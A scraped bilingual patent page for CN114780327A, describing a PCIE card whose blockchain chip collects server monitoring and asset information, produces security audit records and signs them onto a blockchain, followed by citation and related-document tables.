图2示出根据本说明书实施例的一种服务器监控方法的流程图。所述服务器设置有第一PCIE卡,所述第一PCIE卡设置有区块链芯片,所述方法由所述区块链芯片执行,如图2所示,该方法包括:FIG. 2 shows a flowchart of a server monitoring method according to an embodiment of the present specification. The server is provided with a first PCIE card, the first PCIE card is provided with a blockchain chip, and the method is executed by the blockchain chip, as shown in FIG. 2 , the method includes:
步骤21,通过目标接口,获取所述服务器的运行信息;
步骤22,根据所述运行信息,确定所述服务器的安全审核信息;
步骤23,将所述安全审核信息保存到区块链网络。Step 23: Save the security audit information to the blockchain network.
首先,在步骤21,通过目标接口,获取所述服务器的运行信息。First, in
该步骤中,区块链芯片可以通过不同类型的目标接口,获取不同类型的运行信息。In this step, the blockchain chip can obtain different types of operation information through different types of target interfaces.
如前所述,获取的运行信息可以包括带内信息。带内信息可以通过OS中内置的代理程序获取。这里的OS内置的代理程序并非指该代理程序必须是OS本身的组件,而是指运行于OS之中、依赖于OS运行的代理程序。因此,在一个实施例中,服务器的操作系统OS内置有第一代理程序;可以通过第一接口,从所述第一代理程序获取服务器的带内信息。由于PCIE卡通常通过插入服务器的PCIE插槽中,安装到目标服务器。 PCIE(或称PCI-Express,Peripheral Component Interconnect Express,外部设备互连总线接口),是一种高速串行计算机扩展总线标准。因此,在一个例子中,第一接口为PCIE接口。在不同的实施例中,第一PCIE卡可以是不同类型的PCIE卡,在一个实施例中,第一PCIE卡可以包括,PCIE网卡/PCIE GPU卡/PCIE HBA卡中的一种。As previously described, the acquired operational information may include in-band information. In-band information can be obtained through an agent built into the OS. The agent program built into the OS here does not mean that the agent program must be a component of the OS itself, but refers to an agent program that runs in the OS and depends on the OS to run. Therefore, in one embodiment, the operating system OS of the server has a built-in first agent program; the in-band information of the server can be obtained from the first agent program through the first interface. Since the PCIE card is usually inserted into the PCIE slot of the server, it is installed to the target server. PCIE (or PCI-Express, Peripheral Component Interconnect Express, peripheral device interconnect bus interface) is a high-speed serial computer expansion bus standard. Therefore, in one example, the first interface is a PCIE interface. In different embodiments, the first PCIE card may be a different type of PCIE card. In one embodiment, the first PCIE card may include one of a PCIE network card/PCIE GPU card/PCIE HBA card.
在不同的实施例中,可以获取不同细化类型的带内信息,本说明书对此不做限制。在一个实施例中,所述带内信息可以包括:服务器的硬件信息、固件/内核版本、服务器进程信息、端口信息、操作系统启动信息、用户账号信息、crontab文件(用于设置周期性执行的指令)、网络防火墙日志、系统日志中的一种或多种。在后续步骤中,可以根据不同类型的带内信息,进行不同类别的安全审核。In different embodiments, in-band information of different refinement types may be acquired, which is not limited in this specification. In one embodiment, the in-band information may include: hardware information of the server, firmware/kernel version, server process information, port information, operating system startup information, user account information, crontab file (for setting the periodic execution command), network firewall logs, and system logs. In subsequent steps, different types of security audits can be performed based on different types of in-band information.
如前所述,运行信息还可以包括带外信息,带外信息通常可以通过BMC获取。BMC(Baseboard Management Controller,基板管理控制器)是一个不依赖于服务器的处理器、BIOS或操作系统来工作的服务器管理系统。BMC可以监视和操作的对象是服务器硬件。在不同的例子中,BMC例如可以监控服务器的电压、风扇、电源等等,并根据这些信息做相应的调节工作。例如实时调节风扇的转速,以保证服务器处于健康的状态。例如对服务器进行复位,重新启动系统。在一个例子中,还可以记录硬件信息,生成硬件信息日志。由于BMC不依赖于服务器的处理器、BIOS或操作系统,所以无论服务器是否启动,BMC均可以对服务器进行独立的监控。因此,在一个实施例中,所述服务器上还设置有基板管理控制器BMC;可以通过第二接口,从BMC获取服务器的带外信息。由于,BMC通常可以通过NSCI(NetworkController Sideband Interface,网络控制器边带接口)协议传送信息,因此,在一个实施例中,第二接口为支持NCSI协议的接口,例如支持NCSI协议的网口。As mentioned above, the operating information may also include out-of-band information, and the out-of-band information can usually be obtained through the BMC. BMC (Baseboard Management Controller, baseboard management controller) is a server management system that does not depend on the processor, BIOS or operating system of the server to work. What the BMC can monitor and operate on is server hardware. In different examples, the BMC can monitor the server's voltage, fans, power supplies, etc., and make corresponding adjustments based on the information. For example, adjust the fan speed in real time to ensure that the server is in a healthy state. For example, reset the server and restart the system. In one example, hardware information may also be recorded to generate a hardware information log. Since the BMC does not depend on the server's processor, BIOS or operating system, it can monitor the server independently whether the server is started or not. Therefore, in one embodiment, the server is further provided with a baseboard management controller BMC; the out-of-band information of the server can be obtained from the BMC through the second interface. Because the BMC can usually transmit information through the NSCI (Network Controller Sideband Interface, network controller sideband interface) protocol, in one embodiment, the second interface is an interface supporting the NCSI protocol, such as a network port supporting the NCSI protocol.
在不同的实施例中,可以获取不同细化类型的带外信息,本说明书对此也不做限制。在一个实施例中,所述带外信息可以包括:带外日志、带外告警、带外传感器(例如温度、湿度传感器)信息中的一种或多种。In different embodiments, out-of-band information of different refinement types may be acquired, which is not limited in this specification. In one embodiment, the out-of-band information may include one or more of: out-of-band logs, out-of-band alarms, and out-of-band sensor (eg, temperature, humidity sensor) information.
在实际生产场景中,有些计算机病毒会利用,服务器在启动(上电)后、而服务器OS启动前的时间段,例如进行病毒代码引入等操作,为了检测出这些病毒操作,需要获取服务器在启动(上电)后、而服务器OS启动前的运行信息。因此,在一个实施例中,还可以通过第三接口,获取所述服务器在启动后、而服务器OS启动前的中间信息。在一个实施例中,第三接口可以包括串口或串口重定向SOL(Serial Over Lan,局域网串行)。一般而言,所述中间信息可以通过服务器串口获取。而SOL本质上是可以通过服务器上的网口获取串口通讯信息。因此,在一个具体的实施例中,若区块链芯片所在的PCIE卡为PCIE网卡,则可以通过将串口重定向到该PCIE网卡上的常规网口上,通过常规网口获取所述中间信息,如图3所示。In actual production scenarios, some computer viruses will be used. After the server is started (power-on), but before the server OS is started, for example, virus code introduction and other operations are performed. In order to detect these virus operations, it is necessary to obtain the server at startup Operation information after (power-on) but before the server OS is started. Therefore, in one embodiment, the intermediate information after the server is started but before the server OS is started can also be obtained through the third interface. In one embodiment, the third interface may include a serial port or a serial port redirection SOL (Serial Over Lan, serial over local area network). Generally speaking, the intermediate information can be obtained through the serial port of the server. In essence, SOL can obtain serial communication information through the network port on the server. Therefore, in a specific embodiment, if the PCIE card where the blockchain chip is located is a PCIE network card, the intermediate information can be obtained through the conventional network port by redirecting the serial port to a conventional network port on the PCIE network card, As shown in Figure 3.
获取的运行信息还可以包括服务器的网络通讯信息。因此,在一个实施例中,可以通过第四接口,获取所述服务器的网络通信信息。在一个实施例中,所述第四接口包括所述服务器上设置的网卡的标准接口(或称常规接口、常规网口)。在一个例子中,若区块链芯片所在的PCIE卡为PCIE网卡,则可以通过该PCIE网卡上的常规网口,获取所述网络通信信息,如图4所示。在另一个例子中,若区块链芯片所在的PCIE 卡不是PCIE网卡,则可以通过服务器上其他网卡的网口,获取所述网络通信信息。其本质上,是通过服务器CPU从其他网卡获取网络通讯信息,再通过PCIE总线,转发到区块链芯片。或者说,可以通过服务器OS内置的代理程序,从其他网卡获取网络通讯信息,再通过PCIE总线,转发到区块链芯片,如图5所示。The acquired operation information may also include network communication information of the server. Therefore, in one embodiment, the network communication information of the server can be acquired through the fourth interface. In one embodiment, the fourth interface includes a standard interface (or a conventional interface, a conventional network port) of a network card set on the server. In an example, if the PCIE card where the blockchain chip is located is a PCIE network card, the network communication information can be obtained through a conventional network port on the PCIE network card, as shown in FIG. 4 . In another example, if the PCIE card where the blockchain chip is located is not a PCIE network card, the network communication information can be obtained through the network ports of other network cards on the server. In essence, it obtains network communication information from other network cards through the server CPU, and then forwards it to the blockchain chip through the PCIE bus. In other words, the network communication information can be obtained from other network cards through the built-in agent program of the server OS, and then forwarded to the blockchain chip through the PCIE bus, as shown in Figure 5.
然后,在步骤22,根据所述运行信息,确定所述服务器的安全审核信息。Then, in
该步骤中,根据步骤21中获取的不同类型的运行信息,可以进行不同类型的安全核审核,获取对应的安全审核信息。In this step, according to the different types of operation information obtained in
在上述通过OS中的代理程序获取带内信息的实施例中,可以根据所述带内信息,确定带内信息的第一审核信息。在不同的实施例中,可以根据获取的不同细化类型的带内信息,可以确定对应的不同类型的安全审核信息。本说明书对于具体的安全审核类型,并不做限制。在一个例子中,例如可以根据获取的服务器上的系统/应用的版本信息,确定所述系统/应用是否为正确版本,进而确定服务器是否存在安全风险,例如攻击者攻击了所述系统或应用的风险。在另一个例子中,获取的服务器运行信息包括服务器已安装的系统补丁信息,则可以根据已安装系统补丁信息,确定服务器是否遗漏应该安装的必要补丁,进而确定服务器是否存在与所述必要系统补丁对应的系统漏洞。在一个实施例中,第一审核信息可以包括:服务器配置的审核信息、端口控制的审核信息、网络防火墙操作的审核信息、操作系统启动过程的审核信息、服务器多操作系统启动管理器(例如GRUB,GRand UnifiedBootloader)的审核信息、操作系统登录的审核信息、应用可信度量的审核信息、硬盘存储数据输入输出的审核信息、内核漏洞的审核信息的一种或多种。In the above embodiment of acquiring in-band information through an agent program in the OS, the first audit information of the in-band information may be determined according to the in-band information. In different embodiments, different types of corresponding security audit information may be determined according to the acquired in-band information of different refined types. This manual does not limit the specific types of security audits. In one example, for example, according to the obtained version information of the system/application on the server, it can be determined whether the system/application is of the correct version, and then it can be determined whether the server has a security risk, for example, an attacker attacks the system or application. risk. In another example, the obtained server operation information includes information about the system patches installed on the server, then it can be determined whether the server omits the necessary patches that should be installed according to the information on the installed system patches, and then it is determined whether the server has the necessary system patches. Corresponding system vulnerabilities. In one embodiment, the first audit information may include: audit information of server configuration, audit information of port control, audit information of network firewall operation, audit information of operating system startup process, server multi-operating system startup manager (for example, GRUB , GRand UnifiedBootloader) audit information, operating system login audit information, application trust metrics audit information, hard disk storage data input and output audit information, kernel vulnerability audit information one or more.
在上述通过BMC获取带外信息的实施例中,可以根据所述带外信息,确定第二审核信息。在一个实施例中,第二审核信息可以包括:服务器健康状态的审核信息。例如根据获取的服务器的电压、风扇、电源信息,确定服务器是否出于健康的运行状态。In the above embodiment of acquiring out-of-band information through the BMC, the second audit information may be determined according to the out-of-band information. In one embodiment, the second audit information may include: audit information of the server health state. For example, according to the obtained voltage, fan, and power supply information of the server, it is determined whether the server is in a healthy running state.
在上述获取中间信息的实施例中,可以根据所述中间信息,确定第三审核信息。在一个具体的实施例中,第三审核信息例如可以是病毒审核信息。In the above embodiment of obtaining the intermediate information, the third audit information may be determined according to the intermediate information. In a specific embodiment, the third audit information may be virus audit information, for example.
在上述获取网络通信信息的实施例中,可以根据所述网络通信信息,确定与网络通信相关的第四审核信息。在一个具体的实施例中,第四审核信息例如为网络异常流量审核信息。在不同的例子中,第四审核信息还可以是,针对进一步细化的不同类型的异常流量的审核信息,本说明书对此不做限制。In the above embodiment of acquiring network communication information, the fourth audit information related to network communication may be determined according to the network communication information. In a specific embodiment, the fourth audit information is, for example, network abnormal traffic audit information. In a different example, the fourth audit information may also be audit information for different types of abnormal traffic that is further refined, which is not limited in this specification.
此外,根据不同类型的安全审核,获取的对应的安全审核信息,在一个实施例中,可以包括该类安全审核的审核结果。例如,上述对于服务器用户登入的安全审核,对应的安全审核信息,例如可以包括,特定时间段内目标服务器上存在或不存在恶意登入的审核结果。在另一个实施例中,所述安全审核信息还可以包括,与审核结果直接关联的运行信息。例如,一个例子中,确定的审核结果为,特定时间段内目标服务器上存在恶意登入,则安全审核信息还可以包括原始的恶意登入记录,以方便事后与审查结果进行对比验证。In addition, according to different types of security audits, the corresponding security audit information obtained may, in one embodiment, include audit results of this type of security audit. For example, the above-mentioned security audit for server user login, the corresponding security audit information may include, for example, the audit result of the presence or absence of malicious login on the target server within a specific time period. In another embodiment, the security audit information may further include operation information directly associated with the audit result. For example, in an example, if the determined audit result is that there is malicious login on the target server within a certain period of time, the security audit information may also include the original malicious login record, so as to facilitate the comparison and verification with the audit result afterwards.
最后,在步骤13,将所述安全审核信息保存到区块链网络。Finally, in step 13, the security audit information is saved to the blockchain network.
该步骤中,将审核信息保存到区块链网络,可以利用区块链的机制,使得保存的审核信息在事后难以篡改,加强审核信息保存的安全性。根据不同的实施方式,可以利用不同具体类型的区块链,本说明书对此不做限制。在一个实施例中,区块链芯片中可以存储有所述区块链芯片对应的芯片ID,以及与该芯片ID对应的公私钥对。可以利用所述公私钥对中的私钥,对所述安全审核信息进行签名,得到芯片签名;将所述安全审核信息,所述芯片签名一并上传至所述区块链网络。在一个例子中,所述芯片ID可以是芯片出厂前设置的该芯片的唯一ID。In this step, the audit information is saved to the blockchain network, and the mechanism of the blockchain can be used to make the saved audit information difficult to tamper with after the fact, and to enhance the security of the audit information preservation. According to different implementations, different specific types of blockchains may be utilized, which are not limited in this specification. In one embodiment, the blockchain chip may store a chip ID corresponding to the blockchain chip, and a public-private key pair corresponding to the chip ID. The security audit information can be signed by using the private key in the public-private key pair to obtain a chip signature; the security audit information and the chip signature can be uploaded to the blockchain network together. In one example, the chip ID may be the unique ID of the chip set before the chip leaves the factory.
通常,在将信息保存到区块链网络之前,区块链芯片可以在区块链网络上进行注册。因此,在一个实施例中,在将所述安全审核信息,上传至所述区块链网络之前,还可以利用所述芯片ID,在区块链网络上注册所述区块链芯片。Typically, blockchain chips can be registered on the blockchain network before saving the information to the blockchain network. Therefore, in one embodiment, before uploading the security audit information to the blockchain network, the chip ID may also be used to register the blockchain chip on the blockchain network.
区块链芯片针对特定区块链网络的密钥,或者说用于将安全审核信息保存到特定区块链网络的密钥,可以通过与该区块链网络的协商确定。因此,在一个实施例中,所述芯片ID对应的公私钥对,可以通过与所述区块链网络的协商确定。The key of the blockchain chip for a specific blockchain network, or the key used to save the security audit information to a specific blockchain network, can be determined through negotiation with the blockchain network. Therefore, in one embodiment, the public-private key pair corresponding to the chip ID may be determined through negotiation with the blockchain network.
具体的,在一个实施例中,若区块链芯片所在的PCIE卡为PCIE网卡,则可以通过该PCIE网卡上的常规网口,将安全审核信息发送到区块链网络,如图6所示。在另一个实施例中,若区块链芯片所在的PCIE卡不是PCIE网卡,则可以通过服务器上其他网卡的网口,将安全审核信息发送到区块链网络。其本质上,是通过PCIE总线将上链信息发送到服务器CPU,然后服务器CPU通过其他网卡,上传区块链芯片。或者说,可以将上链信息发送到服务器OS内置的代理程序,所述代理程序通过其他网卡将上链信息发送到区块链网络,如图7所示。Specifically, in one embodiment, if the PCIE card where the blockchain chip is located is a PCIE network card, the security audit information can be sent to the blockchain network through a conventional network port on the PCIE network card, as shown in Figure 6 . In another embodiment, if the PCIE card where the blockchain chip is located is not a PCIE network card, the security audit information can be sent to the blockchain network through the network ports of other network cards on the server. In essence, the on-chain information is sent to the server CPU through the PCIE bus, and then the server CPU uploads the blockchain chip through other network cards. In other words, the on-chain information can be sent to an agent program built into the server OS, and the agent program sends the on-chain information to the blockchain network through other network cards, as shown in FIG. 7 .
图8示出根据本说明书实施例的一种服务器资产管理方法的流程图。所述服务器设置有第一PCIE卡,所述第一PCIE卡设置有区块链芯片,所述方法由所述区块链芯片执行。如图8所示,该方法包括:FIG. 8 shows a flowchart of a server asset management method according to an embodiment of the present specification. The server is provided with a first PCIE card, the first PCIE card is provided with a blockchain chip, and the method is executed by the blockchain chip. As shown in Figure 8, the method includes:
步骤81,通过目标接口,获取所述服务器的运行信息;
步骤82,将所述服务器的运行信息,保存到区块链网络,并用于产生服务器资产状态的凭证。Step 82: Save the operation information of the server to the blockchain network, and use it to generate the certificate of the server asset status.
首先,在步骤81,通过目标接口,获取服务器的运行信息。First, in
该步骤中,区块链芯片可以通过不同类型的目标接口,获取不同类型的运行信息。该运行信息可以是与服务器资产状态对应的运行信息,例如可以是服务器软硬件配件的配置信息、状态信息,具体如内存型号、处理器型号、硬盘读写时间、系统版本等。在一个例子中,可以根据这些信息,确定例如服务器软硬件配件的型号/版本新旧、状态优劣,进而确定服务器资产例如在特定时间段内的状态。In this step, the blockchain chip can obtain different types of operation information through different types of target interfaces. The operation information may be operation information corresponding to the server asset status, such as configuration information and status information of server software and hardware accessories, such as memory model, processor model, hard disk read/write time, system version, and the like. In one example, based on the information, it is possible to determine, for example, the old or new model/version of the server software and hardware accessories, and the status, and then determine the status of the server assets, for example, within a specific period of time.
获取的运行信息可以包括带内信息。获取带内信息的过程与方式,类似于步骤21中获取带内信息的过程与方式,可以参见对于步骤21的描述,在此不再赘述。在不同的实施例中,可以获取不同细化类型的带内信息。在一个实施例中,所述带内信息可以包括:服务器使用时间、服务器上的应用的安装记录和使用记录中的一种或多种。The acquired operational information may include in-band information. The process and manner of acquiring in-band information are similar to the process and manner of acquiring in-band information in
获取的运行信息还可以包括带外信息。获取带外信息的过程与方式,类似于步骤21中获取带外信息的过程与方式,可以参见对于步骤21的描述,在此不再赘述。在不同的实施例中,可以获取不同类型的带外信息。在一个实施例中,所述带外信息可以包括:bios/bmc fw版本、OS版本、硬盘容量/硬盘个数、内存容量/内存条数量、主板SN序列号/生产厂家/型号、电源型号/SN号中的一种或多种。The acquired operational information may also include out-of-band information. The process and manner of acquiring the out-of-band information are similar to the process and manner of acquiring the out-of-band information in
获取的运行信息还可以包括服务器的Mac地址。在一个实施例中,第一PCIE卡为PCIE网卡,区块链芯片可以与主控芯片连接。进而,可以通过区块链芯片与主控芯片之间的介质无关接口MII(Media Independent Interfac)或RGMII(Reduced Gigabit MediaIndependent Interface,简化吉比特介质无关接口),获取所述PCIE网卡的 Mac地址(服务器的Mac地址)和/或序列号。The obtained operating information may also include the server's Mac address. In one embodiment, the first PCIE card is a PCIE network card, and the blockchain chip can be connected to the main control chip. Furthermore, the Mac address (server) of the PCIE network card can be obtained through the media independent interface MII (Media Independent Interfac) or RGMII (Reduced Gigabit Media Independent Interface, which simplifies the gigabit media independent interface) between the blockchain chip and the main control chip. Mac address) and/or serial number.
然后,在步骤82,将所述服务器的运行信息,保存到区块链网络。Then, in
该步骤中,将运行信息保存到区块链网络,主要用于产生服务器资产状态的凭证。在一个实施例中,服务器资产状态的凭证可以用于所述服务器资产的登记、确权、评估、鉴定、估值、托管中一项或多项。区块链网络的分布式和数据可信度高的特点,便于服务器资产在例如区块链网络多个参与方之间,进行交易和流通。In this step, the operation information is saved to the blockchain network, which is mainly used to generate the credentials of the server asset status. In one embodiment, the credentials of the server asset status may be used for one or more of registration, validation, evaluation, authentication, valuation, and escrow of the server asset. The distributed nature of the blockchain network and the high reliability of data facilitate the transaction and circulation of server assets between multiple participants in the blockchain network, for example.
根据不同的实施方式,可以利用不同类型的区块链,本说明书对此不做限制。在一个实施例中,区块链芯片中可以存储有所述区块链芯片对应的芯片ID,以及与该芯片ID对应的公私钥对。利用所述公私钥对中的私钥,对所述安全审核信息进行签名,得到芯片签名;将所述安全审核信息,所述芯片签名一并上传至所述区块链网络。在一个例子中,所述芯片ID可以是芯片出厂前设置的该芯片的唯一ID。According to different implementations, different types of blockchains may be utilized, which are not limited in this specification. In one embodiment, the blockchain chip may store a chip ID corresponding to the blockchain chip, and a public-private key pair corresponding to the chip ID. Using the private key in the public-private key pair, the security audit information is signed to obtain a chip signature; the security audit information and the chip signature are uploaded to the blockchain network together. In one example, the chip ID may be the unique ID of the chip set before the chip leaves the factory.
将运行信息上传区块链网络的过程与方式,类似于步骤23中向区块链网络上传审核信息的过程与方式,可以参见对于步骤23的描述,在此不再赘述。The process and method of uploading the operation information to the blockchain network are similar to the process and method of uploading the audit information to the blockchain network in
本说明书另一方面的实施例,还提供一种PCIE卡。图9示出根据本说明书实施例的一种PCIE卡的结构图。如图9所示,该PCIE卡9000包括区块链芯片910,所述区块链芯片包括存储模块91,信息获取模块92,上链模块93,其中,Another embodiment of the present specification further provides a PCIE card. FIG. 9 shows a structural diagram of a PCIE card according to an embodiment of the present specification. As shown in FIG. 9 , the
所述存储模块91用于存储所述区块链芯片的身份标识;The storage module 91 is used to store the identity identifier of the blockchain chip;
所述信息获取模块92用于,在所述PCIE卡安装到服务器中时,通过目标接口,获取所述服务器的运行信息;The
所述上链模块93用于,基于所述存储模块存储的身份标识,将服务器信息保存到区块链网络,其中所述服务器信息基于所述运行信息得到。The on-
在一个实施例中,该PCIE卡900还包括,审核模块94,用于根据所述运行信息,确定所述服务器的安全审核信息,以所述安全审核信息作为所述服务器信息。In one embodiment, the PCIE card 900 further includes an
在一个实施例中,身份标识可以为所述区块链芯片出厂设置的芯片ID,所述存储模块还可以存储有该芯片ID对应于所述区块链网络的公私钥对。In one embodiment, the identity identifier may be a chip ID that is factory-set by the blockchain chip, and the storage module may also store a public-private key pair whose chip ID corresponds to the blockchain network.
在一个实施例中,服务器的操作系统OS内置可以有第一代理程序,信息获取模块可以进一步用于:In one embodiment, the operating system OS of the server may have a built-in first agent program, and the information acquisition module may be further used for:
通过PCIE总线,获取所述第一代理程序发送的所述服务器的带内信息。Obtain the in-band information of the server sent by the first agent program through the PCIE bus.
在一个实施例中,PCIE卡可以为PCIE网卡,所述PCIE网卡还包括主控芯片,所述主控芯片与所述区块链芯片通过交换芯片相连接。In one embodiment, the PCIE card may be a PCIE network card, the PCIE network card further includes a main control chip, and the main control chip is connected to the blockchain chip through a switch chip.
在一个实施例中,所述服务器上还设置有基板管理控制器BMC,所述PCIE网卡设置有支持NCSI协议的专用网口,所述信息获取模块进一步用于:In one embodiment, the server is further provided with a baseboard management controller BMC, the PCIE network card is provided with a dedicated network port supporting the NCSI protocol, and the information acquisition module is further configured to:
通过所述专用网口,获取所述BMC发送的所述服务器的带外信息。Obtain out-of-band information of the server sent by the BMC through the dedicated network port.
在一个实施例中,所述信息获取模块可以进一步用于:In one embodiment, the information acquisition module can be further used for:
通过串口重定向SOL,获取所述服务器在启动后、而服务器OS启动前的中间信息。The SOL is redirected through the serial port to obtain the intermediate information after the server is started but before the server OS is started.
在一个实施例中,所述信息获取模块可以进一步用于:In one embodiment, the information acquisition module can be further used for:
通过PCIE网卡上的标准网口,获取服务器的网络通信信息。Obtain the network communication information of the server through the standard network port on the PCIE network card.
需要理解,本文中的“第一”,“第二”等描述,仅仅为了描述的简单而对相似概念进行区分,并不具有其他限定作用。It should be understood that the descriptions of "first", "second" and so on herein are only for the simplicity of description to distinguish similar concepts, and have no other limiting effect.
本领域技术人员应该可以意识到,在上述一个或多个示例中,本发明所描述的功能可以用硬件、软件、固件或它们的任意组合来实现。当使用软件实现时,可以将这些功能存储在计算机可读介质中或者作为计算机可读介质上的一个或多个指令或代码进行传输。Those skilled in the art should appreciate that, in one or more of the above examples, the functions described in the present invention may be implemented in hardware, software, firmware, or any combination thereof. When implemented in software, the functions may be stored on or transmitted over as one or more instructions or code on a computer-readable medium.
以上所述的具体实施方式,对本发明的目的、技术方案和有益效果进行了进一步详细说明,所应理解的是,以上所述仅为本发明的具体实施方式而已,并不用于限定本发明的保护范围,凡在本发明的技术方案的基础之上,所做的任何修改、等同替换、改进等,均应包括在本发明的保护范围之内。The specific embodiments described above further describe the objectives, technical solutions and beneficial effects of the present invention in detail. It should be understood that the above descriptions are only specific embodiments of the present invention and are not intended to limit the scope of the present invention. Any modification, equivalent replacement, improvement, etc. made on the basis of the technical solution of the present invention shall be included within the protection scope of the present invention.
Claims (30)
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN202111479501.9A CN114780327A (en) | 2021-12-06 | 2021-12-06 | Server monitoring method, asset management method and PCIE card |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN202111479501.9A CN114780327A (en) | 2021-12-06 | 2021-12-06 | Server monitoring method, asset management method and PCIE card |
Publications (1)
| Publication Number | Publication Date |
|---|---|
| CN114780327A true CN114780327A (en) | 2022-07-22 |
Family
ID=82423434
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN202111479501.9A Pending CN114780327A (en) | 2021-12-06 | 2021-12-06 | Server monitoring method, asset management method and PCIE card |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN114780327A (en) |
Cited By (1)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN115865522A (en) * | 2023-02-10 | 2023-03-28 | 中航金网(北京)电子商务有限公司 | Information transmission control method and device, electronic equipment and storage medium |
Citations (6)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN101540694A (en) * | 2008-03-17 | 2009-09-23 | 联想(北京)有限公司 | Method for monitoring server and server adopting same |
| CN104363117A (en) * | 2014-11-04 | 2015-02-18 | 浪潮电子信息产业股份有限公司 | Method for realizing serial port redirection based on IPMI |
| CN110084069A (en) * | 2019-04-17 | 2019-08-02 | 江苏全链通信息科技有限公司 | Server log monitoring method and system based on block chain |
| CN110198347A (en) * | 2019-05-21 | 2019-09-03 | 深圳前海微众银行股份有限公司 | A kind of method for early warning and sub-control server based on block chain |
| CN111738859A (en) * | 2020-07-08 | 2020-10-02 | 支付宝(杭州)信息技术有限公司 | Block chain all-in-one machine and block chain network |
| CN112751729A (en) * | 2020-12-30 | 2021-05-04 | 平安证券股份有限公司 | Log monitoring method, device, medium and electronic equipment |
-
2021
- 2021-12-06 CN CN202111479501.9A patent/CN114780327A/en active Pending
Patent Citations (6)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN101540694A (en) * | 2008-03-17 | 2009-09-23 | 联想(北京)有限公司 | Method for monitoring server and server adopting same |
| CN104363117A (en) * | 2014-11-04 | 2015-02-18 | 浪潮电子信息产业股份有限公司 | Method for realizing serial port redirection based on IPMI |
| CN110084069A (en) * | 2019-04-17 | 2019-08-02 | 江苏全链通信息科技有限公司 | Server log monitoring method and system based on block chain |
| CN110198347A (en) * | 2019-05-21 | 2019-09-03 | 深圳前海微众银行股份有限公司 | A kind of method for early warning and sub-control server based on block chain |
| CN111738859A (en) * | 2020-07-08 | 2020-10-02 | 支付宝(杭州)信息技术有限公司 | Block chain all-in-one machine and block chain network |
| CN112751729A (en) * | 2020-12-30 | 2021-05-04 | 平安证券股份有限公司 | Log monitoring method, device, medium and electronic equipment |
Non-Patent Citations (3)
| Title |
|---|
| CSDN: "可信执⾏环境TEE介绍及在区块链领域的应⽤", pages 1, Retrieved from the Internet <URL:https://blog.csdn.net/triaslab/article/details/102493292> * |
| SANGEETA SONI: "Verification of Integrity and Data Encryption(IDE) for PCIe Devices", pages 1 - 5, Retrieved from the Internet <URL:https://community.cadence.com/cadence_blogs_8/b/fv/posts/verification-of-integrity-and-data-encryption-ide-for-pcie-devices> * |
| SECURITY⽤户: "TPM、TEE和SE的区别", pages 1 - 2, Retrieved from the Internet <URL:https://cloud.tencent.com/developer/ask/sof/116741775> * |
Cited By (2)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN115865522A (en) * | 2023-02-10 | 2023-03-28 | 中航金网(北京)电子商务有限公司 | Information transmission control method and device, electronic equipment and storage medium |
| CN115865522B (en) * | 2023-02-10 | 2023-06-02 | 中航金网(北京)电子商务有限公司 | Information transmission control method and device, electronic equipment and storage medium |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| US11258769B2 (en) | Provisioning network keys to devices to allow them to provide their identity | |
| US9866568B2 (en) | Systems and methods for detecting and reacting to malicious activity in computer networks | |
| CN107580767B (en) | Method and system for managing network activities using biometrics | |
| US10999246B2 (en) | Locked down network interface | |
| EP3405902B1 (en) | Pattern matching based dataset extraction | |
| US7900058B2 (en) | Methods and arrangements for remote communications with a trusted platform module | |
| TWI524204B (en) | A method, apparatus, and system for manageability and secure routing and endpoint access | |
| US11838195B2 (en) | Deployable network sensor for multiple platforms | |
| US9928359B1 (en) | System and methods for providing security to an endpoint device | |
| CN106341381A (en) | Method and system for managing security keys of rack server system | |
| US20160308886A1 (en) | Preventing network attacks on baseboard management controllers | |
| US20170331803A1 (en) | Method for authenticating a networked endpoint using a physical (power) challenge | |
| US9813439B2 (en) | Evaluation node for reporting status via a secure link | |
| US9762626B2 (en) | System and method for as needed connection escalation | |
| CN203968148U (en) | A kind of network security management system with intrusion detection | |
| JP2010263310A (en) | Wireless communication device, wireless communication monitoring system, wireless communication method, and program | |
| US8161558B2 (en) | Network management and administration | |
| US10326599B2 (en) | Recovery agents and recovery plans over networks | |
| CN114780327A (en) | Server monitoring method, asset management method and PCIE card | |
| US8667106B2 (en) | Apparatus for blocking malware originating inside and outside an operating system | |
| US20200329040A1 (en) | System, apparatus and method for remotely authenticating peripheral devices | |
| CN111031067A (en) | Monitoring data transmission method and device of distributed system and electronic equipment | |
| KR101425726B1 (en) | Linked network security system and method based on virtualization in the separate network environment | |
| CN108429727A (en) | Method for secure exchange of discovery link information | |
| Jaeger et al. | Access control and data separation metrics in cloud infrastructures |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| PB01 | Publication | ||
| PB01 | Publication | ||
| SE01 | Entry into force of request for substantive examination | ||
| SE01 | Entry into force of request for substantive examination |